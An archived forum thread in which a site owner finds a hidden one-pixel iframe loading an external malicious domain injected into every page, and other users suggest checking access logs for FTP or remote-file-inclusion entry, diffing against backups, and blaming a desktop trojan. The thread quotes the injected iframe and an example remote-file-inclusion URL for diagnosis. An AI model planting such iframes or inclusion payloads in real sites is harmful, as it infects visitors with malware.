Jump to content

Hacked!


deansaddigh

Recommended Posts

Hi guys, some how someone has physically changed my pages and added

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>

How have they done this, do you think they have got into our ftp account.

Heres  a page with it on.

 

http://www.languageschoolsuk.com/coursecalculator.php

 

if you look at source code , right at the end near the footer you can see.

 

Any help and advice would be brilliant because i have nooooo idea.

Link to post
Share on other sites

I dont have any ideas, but actually removing it is a start. If they continue to put it up, I'd suggest maybe track there IP and block it. Assumign it was user based, they could of done alot more than adding in an iframe practically invisible.

 

I can actually say, that iframe is on every page in your site. I only checked 3, but if theres 3 random ones with the iframe in, it's likely they'll be alot more!

Link to post
Share on other sites

Thanks Teddy for your advice, i have started to remove them all.

The thing i dont understand is, to physically change the page. they would have to have hacked our ftp server and physically modified the page, am i wright in thinking this.

Link to post
Share on other sites

The web server access logs would indicate the who/what/when the files were modified (wrote to.) That would pin down if it was through FTP access, through the web hosting control panel, or through a script on your site (or some other site on the server.)

 

Assuming that your pages include content that is specified on the end of the URL, you should also look at the access logs to find any unusual URLs where your pages were requested with get parameters that could have gotten your script(s) to execute included php code from another site. There would be whole URL's supplied as get parameters, something like -

 

http://yourdomain.com/your_page.php?page=http://someURL/some_page.ext

 

You should also download all the files and compare them with the last backup up make so that you can both find exactly what was changed and find any new files (such as a file management script that got uploaded to your site.)

Link to post
Share on other sites
  • 6 months later...

This is NOT someone who has hacked your FTP.

This comes from a trojan virus on your computer that not only screws up your whole computer, denying you access to any antivirus sites and stops all downloads.

It also infects ALL your HTML files on your computer with this little IFrame script.

 

I basically had to wipe my harddrive clean to get rid of the virus and after getting all my backed up files to my computer again I noticed that I had "infected" my entire website as well the next time I updated it.

 

The reason for me necro posting this is because this topic comes up as top 3 on Google when searching for "Brenz.pl/rc/".

I just thought the information should be correct.

 

I hope this helps someone!

Link to post
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.